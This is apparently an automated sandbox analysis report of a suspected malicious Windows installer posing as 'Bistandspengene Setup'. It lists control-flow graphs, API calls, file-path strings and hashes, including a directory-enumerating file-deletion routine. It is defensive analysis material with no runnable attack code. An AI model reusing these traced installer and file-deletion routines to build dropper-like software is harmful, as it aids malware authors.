                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                                                                                                          • Opcode ID: e520d1d30b512afb12423a7735dcee7f53e95ce598d54926476c1ad935aac9f3
                                                                                                                                                                                                                          • Instruction ID: 92be4e2f0a71e0becefd48613cebd317121b53e3330ca333a75e7b8088edbb55
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e520d1d30b512afb12423a7735dcee7f53e95ce598d54926476c1ad935aac9f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49027FB0900209EFDB209F95DD85AAE7BB5FB84314F10817AF610BA2E1C7799D42CF58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 499 406072-40607d 500 406090-4060a6 499->500 501 40607f-40608e 499->501 502 4060ac-4060b9 500->502 503 4062be-4062c4 500->503 501->500 502->503 506 4060bf-4060c6 502->506 504 4062ca-4062d5 503->504 505 4060cb-4060d8 503->505 508 4062e0-4062e1 504->508 509 4062d7-4062db call 406050 504->509 505->504 507 4060de-4060ea 505->507 506->503 510 4060f0-40612c 507->510 511 4062ab 507->511 509->508 513 406132-40613d GetVersion 510->513 514 40624c-406250 510->514 515 4062b9-4062bc 511->515 516 4062ad-4062b7 511->516 517 406157 513->517 518 40613f-406143 513->518 519 406252-406256 514->519 520 406285-406289 514->520 515->503 516->503 524 40615e-406165 517->524 518->517 521 406145-406149 518->521 522 406266-406273 call 406050 519->522 523 406258-406264 call 405f97 519->523 525 406298-4062a9 lstrlenW 520->525 526 40628b-406293 call 406072 520->526 521->517 528 40614b-40614f 521->528 537 406278-406281 522->537 523->537 530 406167-406169 524->530 531 40616a-40616c 524->531 525->503 526->525 528->517 533 406151-406155 528->533 530->531 535 4061a8-4061ab 531->535 536 40616e-406194 call 405f1d 531->536 533->524 538 4061bb-4061be 535->538 539 4061ad-4061b9 GetSystemDirectoryW 535->539 547 406233-406237 536->547 550 40619a-4061a3 call 406072 536->550 537->525 541 406283 537->541 543 4061c0-4061ce GetWindowsDirectoryW 538->543 544 406229-40622b 538->544 542 40622d-406231 539->542 546 406244-40624a call 4062e4 541->546 542->546 542->547 543->544 544->542 549 4061d0-4061da 544->549 546->525 547->546 552 406239-40623f lstrcatW 547->552 554 4061f4-40620a SHGetSpecialFolderLocation 549->554 555 4061dc-4061df 549->555 550->542 552->546 558 406225 554->558 559 40620c-406223 SHGetPathFromIDListW CoTaskMemFree 554->559 555->554 557 4061e1-4061e8 555->557 560 4061f0-4061f2 557->560 558->544 559->542 559->558 560->542 560->554
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetVersion.KERNEL32(00000000,0042C228,?,004051E6,0042C228,00000000,00000000,0041C400), ref: 00406135
                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B3
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061C6
                                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406202
                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406210
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 0040621B
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040623F
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,0042C228,?,004051E6,0042C228,00000000,00000000,0041C400), ref: 00406299
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                          • API String ID: 900638850-1230650788
                                                                                                                                                                                                                          • Opcode ID: 9ac22be3adfbab36e9e2758bb774a502216386bf045014d88804defae461a58b
                                                                                                                                                                                                                          • Instruction ID: 6a0e75f8176bdfaa808a817e977aa907b1c5d4b6119349843486ba00336cef2a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ac22be3adfbab36e9e2758bb774a502216386bf045014d88804defae461a58b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45611E71A00105ABDF20AF65CC41AEE37A5EF45314F12817FE852BA2D0D73D8AA1CB4D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 561 405841-405867 call 405b0c 564 405880-405887 561->564 565 405869-40587b DeleteFileW 561->565 567 405889-40588b 564->567 568 40589a-4058aa call 406050 564->568 566 4059fd-405a01 565->566 570 405891-405894 567->570 571 4059ab-4059b0 567->571 574 4058b9-4058ba call 405a50 568->574 575 4058ac-4058b7 lstrcatW 568->575 570->568 570->571 571->566 573 4059b2-4059b5 571->573 576 4059b7-4059bd 573->576 577 4059bf-4059c7 call 406393 573->577 578 4058bf-4058c3 574->578 575->578 576->566 577->566 585 4059c9-4059dd call 405a04 call 4057f9 577->585 581 4058c5-4058cd 578->581 582 4058cf-4058d5 lstrcatW 578->582 581->582 584 4058da-4058f6 lstrlenW FindFirstFileW 581->584 582->584 586 4059a0-4059a4 584->586 587 4058fc-405904 584->587 603 4059f5-4059f8 call 4051af 585->603 604 4059df-4059e2 585->604 586->571 589 4059a6 586->589 590 405924-405938 call 406050 587->590 591 405906-40590e 587->591 589->571 601 40593a-405942 590->601 602 40594f-40595a call 4057f9 590->602 593 405910-405918 591->593 594 405983-405993 FindNextFileW 591->594 593->590 598 40591a-405922 593->598 594->587 597 405999-40599a FindClose 594->597 597->586 598->590 598->594 601->594 606 405944-40594d call 405841 601->606 614 40597b-40597e call 4051af 602->614 615 40595c-40595f 602->615 603->566 604->576 605 4059e4-4059f3 call 4051af call 405ef1 604->605 605->566 606->594 614->594 617 405961-405971 call 4051af call 405ef1 615->617 618 405973-405979 615->618 617->594 618->594
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,76533420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040586A
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(0042F250,\*.*), ref: 004058B2
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 004058D5
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,76533420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DB
                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,76533420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058EB
                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040598B
                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040599A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • \*.*, xrefs: 004058AC
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040584E
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe", xrefs: 00405841
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                                          • API String ID: 2035342205-2673858874
                                                                                                                                                                                                                          • Opcode ID: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
                                                                                                                                                                                                                          • Instruction ID: caf420165dc21d0a99f0983ed575dd8be70d76c6b9b5ff92ec706b465e099e4b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB41B171800A14EADB21AB65CD49BBF7678EF85764F10423BF801B11D1D77C4A82DE6E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405B55,0042FA50,0042FA50,00000000,0042FA50,0042FA50, 4Sv,?,C:\Users\user\AppData\Local\Temp\,00405861,?,76533420,C:\Users\user\AppData\Local\Temp\), ref: 0040639E
                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004063AA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                          • Opcode ID: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                                                                                                                                                                                          • Instruction ID: 351587cf9ce3a522800e1c73501a9738d9f8821b35168cd3fdb078f4a7df3edc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2D012315081209BC34157787E0C84B7B5C9F1A3317259F36F96AF12E1CB348C2286DC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 255 403c3c-403c4e 256 403c54-403c5a 255->256 257 403d8f-403d9e 255->257 256->257 258 403c60-403c69 256->258 259 403da0-403de8 GetDlgItem * 2 call 404114 SetClassLongW call 40140b 257->259 260 403ded-403e02 257->260 263 403c6b-403c78 SetWindowPos 258->263 264 403c7e-403c81 258->264 259->260 261 403e42-403e47 call 404160 260->261 262 403e04-403e07 260->262 274 403e4c-403e67 261->274 266 403e09-403e14 call 401389 262->266 267 403e3a-403e3c 262->267 263->264 269 403c83-403c95 ShowWindow 264->269 270 403c9b-403ca1 264->270 266->267 288 403e16-403e35 SendMessageW 266->288 267->261 273 4040e1 267->273 269->270 275 403ca3-403cb8 DestroyWindow 270->275 276 403cbd-403cc0 270->276 283 4040e3-4040ea 273->283 281 403e70-403e76 274->281 282 403e69-403e6b call 40140b 274->282 284 4040be-4040c4 275->284 278 403cc2-403cce SetWindowLongW 276->278 279 403cd3-403cd9 276->279 278->283 286 403d7c-403d8a call 40417b 279->286 287 403cdf-403cf0 GetDlgItem 279->287 291 403e7c-403e87 281->291 292 40409f-4040b8 DestroyWindow EndDialog 281->292 282->281 284->273 289 4040c6-4040cc 284->289 286->283 293 403cf2-403d09 SendMessageW IsWindowEnabled 287->293 294 403d0f-403d12 287->294 288->283 289->273 296 4040ce-4040d7 ShowWindow 289->296 291->292 297 403e8d-403eda call 406072 call 404114 * 3 GetDlgItem 291->297 292->284 293->273 293->294 298 403d14-403d15 294->298 299 403d17-403d1a 294->299 296->273 325 403ee4-403f20 ShowWindow KiUserCallbackDispatcher call 404136 EnableWindow 297->325 326 403edc-403ee1 297->326 303 403d45-403d4a call 4040ed 298->303 304 403d28-403d2d 299->304 305 403d1c-403d22 299->305 303->286 308 403d63-403d76 SendMessageW 304->308 310 403d2f-403d35 304->310 305->308 309 403d24-403d26 305->309 308->286 309->303 313 403d37-403d3d call 40140b 310->313 314 403d4c-403d55 call 40140b 310->314 323 403d43 313->323 314->286 322 403d57-403d61 314->322 322->323 323->303 329 403f22-403f23 325->329 330 403f25 325->330 326->325 331 403f27-403f55 GetSystemMenu EnableMenuItem SendMessageW 329->331 330->331 332 403f57-403f68 SendMessageW 331->332 333 403f6a 331->333 334 403f70-403fae call 404149 call 406050 lstrlenW call 406072 SetWindowTextW call 401389 332->334 333->334 334->274 343 403fb4-403fb6 334->343 343->274 344 403fbc-403fc0 343->344 345 403fc2-403fc8 344->345 346 403fdf-403ff3 DestroyWindow 344->346 345->273 347 403fce-403fd4 345->347 346->284 348 403ff9-404026 CreateDialogParamW 346->348 347->274 350 403fda 347->350 348->284 349 40402c-404083 call 404114 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 348->349 349->273 355 404085-40409d ShowWindow call 404160 349->355 350->273 355->284
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C78
                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403C95
                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403CA9
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CC5
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403CE6
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFA
                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D01
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403DAF
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403DB9
                                                                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD3
                                                                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E24
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403ECA
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403EEB
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EFD
                                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F2E
                                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403F35
                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F4D
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F60
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0042D248,?,0042D248,Bistandspengene Setup), ref: 00403F89
                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,0042D248), ref: 00403F9D
                                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004040D1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                          • String ID: Bistandspengene Setup
                                                                                                                                                                                                                          • API String ID: 3282139019-953744084
                                                                                                                                                                                                                          • Opcode ID: 1e8f8ab3894185fee3e819c4da667bb3c8cf9c8625066028452a86f04d68d7ae
                                                                                                                                                                                                                          • Instruction ID: 977002fee4e807fcea2a4689fe207fdbad8331f3a024ab3ce592dbd86d7f0908
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e8f8ab3894185fee3e819c4da667bb3c8cf9c8625066028452a86f04d68d7ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EC1D171504204BFDB216F61EE89E2B3A69FB88706F04053EF641B21F0CB799991DB6D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 358 403899-4038b1 call 40642a 361 4038b3-4038c3 call 405f97 358->361 362 4038c5-4038fc call 405f1d 358->362 371 40391f-403948 call 403b6f call 405b0c 361->371 367 403914-40391a lstrcatW 362->367 368 4038fe-40390f call 405f1d 362->368 367->371 368->367 376 4039da-4039e2 call 405b0c 371->376 377 40394e-403953 371->377 383 4039f0-403a15 LoadImageW 376->383 384 4039e4-4039eb call 406072 376->384 377->376 378 403959-403973 call 405f1d 377->378 382 403978-403981 378->382 382->376 385 403983-403987 382->385 387 403a96-403a9e call 40140b 383->387 388 403a17-403a47 RegisterClassW 383->388 384->383 389 403999-4039a5 lstrlenW 385->389 390 403989-403996 call 405a31 385->390 399 403aa0-403aa3 387->399 400 403aa8-403ab3 call 403b6f 387->400 391 403b65 388->391 392 403a4d-403a91 SystemParametersInfoW CreateWindowExW 388->392 397 4039a7-4039b5 lstrcmpiW 389->397 398 4039cd-4039d5 call 405a04 call 406050 389->398 390->389 396 403b67-403b6e 391->396 392->387 397->398 403 4039b7-4039c1 GetFileAttributesW 397->403 398->376 399->396 411 403ab9-403ad3 ShowWindow call 4063ba 400->411 412 403b3c-403b44 call 405282 400->412 406 4039c3-4039c5 403->406 407 4039c7-4039c8 call 405a50 403->407 406->398 406->407 407->398 419 403ad5-403ada call 4063ba 411->419 420 403adf-403af1 GetClassInfoW 411->420 417 403b46-403b4c 412->417 418 403b5e-403b60 call 40140b 412->418 417->399 421 403b52-403b59 call 40140b 417->421 418->391 419->420 424 403af3-403b03 GetClassInfoW RegisterClassW 420->424 425 403b09-403b2c DialogBoxParamW call 40140b 420->425 421->399 424->425 429 403b31-403b3a call 4037e9 425->429 429->396
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                                                                                                                                            • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(1033,0042D248), ref: 0040391A
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,76533420), ref: 0040399A
                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 004039AD
                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 004039B8
                                                                                                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114), ref: 00403A01
                                                                                                                                                                                                                            • Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4
                                                                                                                                                                                                                          • RegisterClassW.USER32(00433E80), ref: 00403A3E
                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A56
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A8B
                                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403AC1
                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403AED
                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403AFA
                                                                                                                                                                                                                          • RegisterClassW.USER32(00433E80), ref: 00403B03
                                                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403C3C,00000000), ref: 00403B22
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
